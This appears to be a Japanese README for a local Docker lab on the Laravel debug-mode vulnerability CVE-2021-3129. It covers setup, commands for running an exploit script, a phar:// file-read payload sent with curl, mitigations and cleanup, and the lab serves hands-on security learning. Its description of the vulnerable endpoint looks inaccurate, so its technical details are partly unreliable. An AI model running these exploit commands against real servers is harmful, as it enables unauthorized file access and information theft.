
CVE-2021-3129: Laravel Debug Mode RCE - Pythonエクスプロイト、Dockerコンテナ、およびセキュリティ分析ガイドを備えた完全な攻撃テストラボ。
CVE-2021-3129 を悪用するためのハンズオンラボ - 未認証でのファイル読み取りと潜在的な RCE を可能にする重大な Laravel 脆弱性です。
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab
# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest
# Test
curl http://localhost:8080/_ide_helper.php
# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
| プロパティ | 詳細 |
|---|---|
| 深刻度 | CVSS 7.5 (High) |
| 影響を受けるバージョン | Laravel < 8.4.2, < 7.30.4 |
| 影響 | 任意ファイル読み取り、情報漏えい、潜在的な RCE |
| 認証要件 | なし |
| 攻撃ベクトル | ネットワーク |
/_ide_helper.php エンドポイントをテストするphar:// ラッパーを使用してファイルを読み取る# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab
# 2. Build container
docker build -t cve-2021-3129-lab:latest .
# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest
# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php
# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!
VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080
# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10
# Help
python3 cve_2021_3129_exploit.py -h
# Test endpoint
curl http://localhost:8080/_ide_helper.php
# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application
# Stop container
docker stop laravel-cve-2021-3129
# Remove container
docker rm laravel-cve-2021-3129
# Remove image
docker rmi cve-2021-3129-lab:latest
Q: インターネット上でテストできますか?
A: いいえ。これはローカルホスト専用です。自分が所有していないシステムでテストしないでください。
Q: パッチ適用済みバージョンでも動作しますか?
A: いいえ。Laravel 8.4.2+ および 7.30.4+ はパッチが適用されています。
Q: エクスプロイトを変更できますか?
A: はい。コードは学習用に完全にコメントされています。
Q: ネットワークトラフィックをキャプチャするには?
A: tcpdump または Wireshark を使用します:
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng
⚠️ 教育目的のみ
✅ 許可される用途:
❌ 禁止される用途:
所有しているシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。
Naresh R (@theNareshofficial)
MIT ライセンス - LICENSE ファイルを参照してください